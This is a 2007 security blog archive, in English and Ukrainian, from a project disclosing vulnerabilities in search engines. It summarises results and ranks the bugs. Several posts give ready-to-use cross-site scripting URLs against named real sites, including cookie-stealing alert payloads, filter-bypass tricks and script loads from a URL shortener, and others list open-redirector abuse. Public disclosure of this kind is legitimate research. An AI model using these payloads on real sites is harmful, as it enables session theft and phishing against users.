Архів для категорії 'MOSEB'

Month of Search Engines Bugs: totals

23:57 01.07.2007

My project Month of Search Engines Bugs has finished and I’m summing up.

In the project took part 33 search engines (30 web engines and 3 local engines) of 19 vendors, some vendors have several engines. The list of project’s participants (in order of appearance): Meta, Yahoo, HotBot, Gigablast, MSN, Clusty, Yandex, Yandex.Server (local engine), Search Europe, Rambler, Ask.com, Ezilon, AltaVista, AltaVista local (local engine), MetaCrawler, Mamma, Google, Google Custom Search Engine (local engine), My Way, Lycos, Aport, Netscape Search, WebCrawler, Dogpile, AOL Search, My Search, My Web Search, LookSmart, DMOZ (Open Directory Project), InfoSpace, Euroseek, Kelkoo, Excite.

Altogether there were published 104 vulnerabilities in mentioned engines. Including Cross-Site Scripting (as XSS, and as HTML Injection), Full path disclosure, Content Spoofing and Information disclosure vulnerabilities. It is without taking into account redirectors in search engines (altogether there were published 23 redirectors).

Results of the projects: fixed 44 vulnerabilities from 104 (without taking into account redirectors). It is 42,31% fixed vulnerabilities. Owners of search engines have a place for improvements of their engines’ security.

Note, that from all search engines vendors only two thanked me (from 19 vendors of 33 search engines), for time that I spent on them, for searching vulnerabilities in their systems and for helping of improvement of their engines’ security (these were Rambler and Ezilon). But all others owners of search engines even didn’t think (were lazy) to do that. That is very unethical from their side and they need to work under their ethic and culture.

As I wrote in project description, I decided to define winners of Month of Search Engines Bugs in two nominations. During conducting of the project every visitor of the site could vote for the bug that he like with posting a comment in appropriate post. Today I counted up votes of visitors and I was announcing of the winners.

Results of voting:

Best bug of MOSEB MustLive Choice

Also draw attention at MOSEB-05 Bonus: Vulnerabilities at autos.msn.com, at both of these projects of MSN vulnerabilities based on Expressive comments space-hack filters bypass technique.

Best bug of MOSEB Visitors Choice

It is interesting vulnerability, besides it’s most dangerous bug of MOSEB.

The list of TOP5 bugs of MOSEB (by visitors choice):

  1. MOSEB-20 Bonus: Google dorks strikes back
  2. MOSEB-06: Vulnerabilities at clusty.com
  3. MOSEB-05: Vulnerability at shopping.msn.com
  4. MOSEB-15: Vulnerabilities at images.google.com
  5. MOSEB-10: Vulnerabilities at www.ask.com

I congratulate the winners Microsoft and Google! You make the best vulnerabilities in your engines ;-) . Others search engines developers need to learn from you. But all vendors need to work on improvement of their engines’ security.

Thanks for watching MOSEB project. Best regards. And attend to your security.

P.S.

By the way, before conducting of this project (MOSEB), I conducted one more interesting project of disclosing vulnerabilities at important sites. In January I was conducting presidents fiesta - I was publishing holes in sites of presidents :-) (certainly I informed administration of these sites about the vulnerabilities).

You can acquaint yourself with them also.

Місяць багів в Пошукових Системах: підсумки

23:24 01.07.2007

Завершився мій проект Місяць багів в Пошукових Системах і я підводжу підсумки.

В проекті прийняли участь 33 пошукові системи (30 веб пошуковців та 3 локальних пошуковця) 19 вендорів, деякі вендори володіють декількома пошуковцями. Перелік учасників проекту (в порядку появи): Meta, Yahoo, HotBot, Gigablast, MSN, Clusty, Yandex, Yandex.Server (локальний пошуковець), Search Europe, Rambler, Ask.com, Ezilon, AltaVista, AltaVista local (локальний пошуковець), MetaCrawler, Mamma, Google, Google Custom Search Engine (локальний пошуковець), My Way, Lycos, Aport, Netscape Search, WebCrawler, Dogpile, AOL Search, My Search, My Web Search, LookSmart, DMOZ (Open Directory Project), InfoSpace, Euroseek, Kelkoo, Excite.

Всього оприлюднено 104 уразливостей в зазначених пошуковцях. Включаючи Cross-Site Scripting (як XSS, так і HTML Injection), Full path disclosure, Content Spoofing та Information disclosure уразливості. Це без врахування редиректорів в пошукових системах (всього було опубліковано 23 редиректори).

Результати проекту: виправлено 44 уразливостей з 104 (без врахування редиректорів). Це 42,31% виправлених уразливостей. Власникам пошукових систем є ще куди покращувати безпеку своїх пошуковців.

Зазначу, що з усіх вендорів пошукових систем лише двоє подякували мені (з 19 вендорів 33 пошукових систем), за витрачений на них час, за пошук уразливостей в їх системах та допомогу в підвищенні безпеки їх пошуковців (це Rambler та Ezilon). А всі інші власники пошукових систем навіть не подумали (полінилися) це зробити. Що дуже не етично з їх сторони і над своєю етикою та культурою їм ще варто попрацювати.

Як я писав в описі проекту, я вирішив визначити переможців Місяця багів в Пошукових Системах в двох номінаціях. Під час проведення проекту кожен відвідувач сайту міг проголосувати за вподобаний баг залишивши коментар у відповідному записі. Сьогодні я підрахував голоси відвідувачів і оголошую переможців.

Результати голосування:

Best bug of MOSEB MustLive Choice

Також зверніть увагу на MOSEB-05 Bonus: Vulnerabilities at autos.msn.com, на обох цих проектах MSN уразливості базується на техніці Expressive comments space-hack filters bypass technique.

Best bug of MOSEB Visitors Choice

Цікава уразливість, до того ж це найбільш небезпечний баг MOSEB.

Список TOP5 багів MOSEB (відповідно до вибору відвідувачів):

  1. MOSEB-20 Bonus: Google dorks strikes back
  2. MOSEB-06: Vulnerabilities at clusty.com
  3. MOSEB-05: Vulnerability at shopping.msn.com
  4. MOSEB-15: Vulnerabilities at images.google.com
  5. MOSEB-10: Vulnerabilities at www.ask.com

Поздоровляю переможців Microsoft та Google! Уразливості в своїх пошуковцях ви робите найкращі ;-) . Іншим розробникам пошукових систем треба ще вчитися у вас. Але усім вендорам треба ще працювати над покращенням безпеки своїх пошуковців.

Спасибі, що слідкували за проектом MOSEB. Усього найкращого. І приділяйте увагу своїй безпеці.

P.S.

До речі, перед проведенням даного проекту (MOSEB), я проводив ще один цікавий проект по оприлюдненню уразливостей на важливих сайтах. В січні я проводив президентську фієсту - публікував дірки на сайтах президентів :-) (звісно я сповістив адміністрацію цих сайтів про уразливості).

Також можете ознайомитися.

MOSEB-30 Bonus: Redirectors #2

22:45 30.06.2007

New bonus vulnerabilities in MOSEB. Today is the day of redirectors, as I wrote in MOSEB-30: Redirectors #1, and I continue to show you redirectors holes in search engines.

The list of redirectors in search engines (part 2).

MSN:

Meta:

Aport:

AOL Search:

Netscape Search:

MetaCrawler:

InfoSpace:

About Google’s redirectors.

I wrote about three Google’s redirectors in MOSEB-30 and I told, that first one already fixed.

This redirector hole worked some time ago, but after security community attracted attention of Google to the issue, they made protection for this hole (using redirect notice page). But Google fixed it poorly, so it is possible to bypass this protection.

You just need to make working link (with necessary hash) and redirector will work :-) . But this hash is temporal, so you need to update it periodically to fresh one.

Or you can use another redirector from Google (it is another version of first redirector and with constant hash):

Moral: clicking on redirecting links can be dangerous.

P.S.

Tomorrow I will total the project’s results. And also I’ll count up votes for all the bugs and find out the best bug of MOSEB. So if you didn’t vote for the bugs yet (in comments) you can do it now, and tomorrow you will see the results.

MOSEB-30: Redirectors #1

19:32 30.06.2007

Like I wrote in project description I planned a surprise for you on 30th day of Month of Search Engines Bugs. And today is the day of redirectors.

About redirectors I wrote in my article Redirectors in May (and I listed some redirectors in article). So for detailed information read this article (if you familiar with Ukrainian, and you should to be familiar, if you don’t want to miss all interesting) and now I tell you some words about this issue.

In a short - redirectors are bad. Because it can be used by bad guys for malicious purposes (like phishing). And so redirectors must be fixed - to not allow blind redirecting. This is serious problem which didn’t take attention from search engine vendors and web developers yet (just Google fixed one from many of its redirectors and fixed it poorly). So I am trying to attract attention of engines vendors and Internet community to this issue - I already wrote some times at my site about them and I decided to dedicate one day of MOSEB to the redirectors.

The list of redirectors in search engines (part 1).

Google:

Yahoo:

Ask.com:

Yandex:

Rambler:

Excite:

Webcrawler:

Moral: redirectors can be dangerous.

P.S.

In bonus post I’ll wrote about redirectors holes in others search engines and show you how to bypass Google’s protection for their first redirector. So wait for today’s bonus post ;-) .

MOSEB-29 Bonus: Vulnerabilities in Excite White Pages

22:32 29.06.2007

New bonus vulnerabilities in Excite. In this case vulnerabilities at other domain, than in MOSEB-29: Vulnerabilitiy at money.excite.com.

The vulnerability is at Excite White Pages (kevdb.infospace.com) which located on server of InfoSpace (Excite’s partner). These Cross-Site Scripting holes I found 31.05.2007.

XSS:

The vulnerabilities are in qn, qf and qc parameters:
http://kevdb.infospace.com/info.xcite/wp/results/kevdb?OTMPL=%2Fwp%2Fresults.htm&QN=%3Cscript%20src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E&KCFG=US

Moral: seeking in white pages can be dangerous.

Note, that Excite engine belongs to IAC Search & Media. So Ask.com also responsible for these vulnerabilities.

Also note, that Excite White Pages engine use InfoSpace engine. So InfoSpace also responsible for these vulnerabilities.

MOSEB-29: Vulnerability at money.excite.com

19:48 29.06.2007

Next participant of the project is Excite search engine. It is one of the popular meta search engines (in USA).

The vulnerability is at Excite Money & Investing (money.excite.com) in symbol search results. This Cross-Site Scripting hole I found 31.05.2007. And I used null byte filters bypass technique for Mozilla and slash filters bypass technique for Internet Explorer.

XSS:

The vulnerability is in symbol_search_text parameter:
http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=%3Cscript%00src=%22http://tinyurl.com/2tkq8d%22%3E%3C/script%3E

Also page with html injection hole has PR7. It is a dream and black seo guys will be happy :-) .

Moral: searching for money can be dangerous.

Note, that Excite engine belongs to IAC Search & Media. So Ask.com also responsible for this vulnerability.

P.S.

Also I prepared others holes concerned with Excite. So wait for today’s bonus post ;-) .

MOSEB-28 Bonus: Vulnerability at shopping.yahoo.com

22:42 28.06.2007

New bonus vulnerability in MOSEB. This time vulnerability at Yahoo! Shopping. As I wrote in MOSEB-28, Kelkoo belongs to Yahoo (and used as a part of Yahoo! Shopping) so I decided to write about hole at shopping.yahoo.com (which is relative to Kelkoo engine that described in MOSEB-28: Vulnerabilities in Kelkoo). This is new vulnerability in Yahoo, after MOSEB-02.

The vulnerability is at Yahoo! Shopping (shopping.yahoo.com) in Abuse Report. This Cross-Site Scripting hole I found 24.06.2007 and it works in Internet Explorer. It is very cute hole: to bypass filters I used variable-width encoding with expression technique.

XSS:

The vulnerability is in review_excerpt with review_title parameters:
http://shopping.yahoo.com/merchrating/abuse_report.html;_ylu=?message_id=scd-337&merchant_id=1002688&review_excerpt=style%3Dxss:expression(alert(document.cookie))%20%C0&review_title=%C0

Moral: writing reports to search engine vendors can be dangerous.

MOSEB-28: Vulnerabilities in Kelkoo

20:34 28.06.2007

Next participant of the project is Kelkoo search engine. It is one of the popular search engines for shopping (and now it belongs to Yahoo and is a part of Yahoo! Shopping).

The vulnerabilities are at two domains of Kelkoo (books.kelkoo.co.uk and fr.kelkoo.be) in books comparison and digital cameras comparison. These Cross-Site Scripting hole I found 27.05.2007 (at books.kelkoo.co.uk) and 25.06.2007 (at fr.kelkoo.be) and they both are DOM Based XSS (pretty ones).

XSS in DOM:

The vulnerability is in isbn parameter:
http://books.kelkoo.co.uk/ctl/do/compare?from=shopbot&catPath=uk%2Fbooks&catId=100801&isbn=%27==%27%27){;}}alert(document.cookie);function%20a(myisbn){if(%27

There is only one moment with it (such as with Microsoft at MOSEB-05 and Rambler at MOSEB-09) - Kelkoo fixed this vulnerability before this official disclosure. As I checked this hole four days ago, I found that they fixed this hole (which were planned for MOSEB). It was bad move from them to fix this vuln untimely (because when you are in project, holes need to be fixed in time). But I found abother hole at Kelkoo, which I present for you. Kelkoo and Yahoo (and others vendors) need to understand, that they can’t escape from me and my project :-) .

XSS in DOM:

The vulnerability is in pids parameter:
http://fr.kelkoo.be/ctl/do/compareProducts?catId=124901&pids=%22');alert(document.cookie);//

Moral: searching for shopping can be risky.

Note, that Kelkoo engine belongs to Yahoo! Inc. So Yahoo also responsible for these vulnerabilities.

P.S.

Also I prepared another hole concerned with Kelkoo and Yahoo. So wait for today’s bonus post ;-) .

MOSEB-27: Vulnerability at euroseek.com

21:54 27.06.2007

Next participant of the project is Euroseek search engine. Euroseek it is regional search portal designed to find information in Europe.

The vulnerability is at Euroseek (euroseek.com) in search results. This Cross-Site Scripting hole I found 30.05.2007.

XSS:

The vulnerability is in language parameter:
http://euroseek.com/system/search.cgi?mode=internet&language=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: regional seeking can be dangerous.

Note, that Euroseek engine use Google search engine. So Google also responsible for this vulnerability.

MOSEB-26 Bonus: Vulnerability at ypng.infospace.com

22:31 26.06.2007

New bonus vulnerability in InfoSpace. In this case vulnerability at other domain, than in MOSEB-26: Vulnerabilities at www.infospace.com.

The vulnerability is at InfoSpace (ypng.infospace.com) in Yellow Pages search. This Cross-Site Scripting hole I found 27.05.2007.

XSS:

The vulnerability is in qa parameter:
http://ypng.infospace.com/home/yellow-pages/redir.htm?fromform=near&qa=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: searching in yellow pages can be dangerous.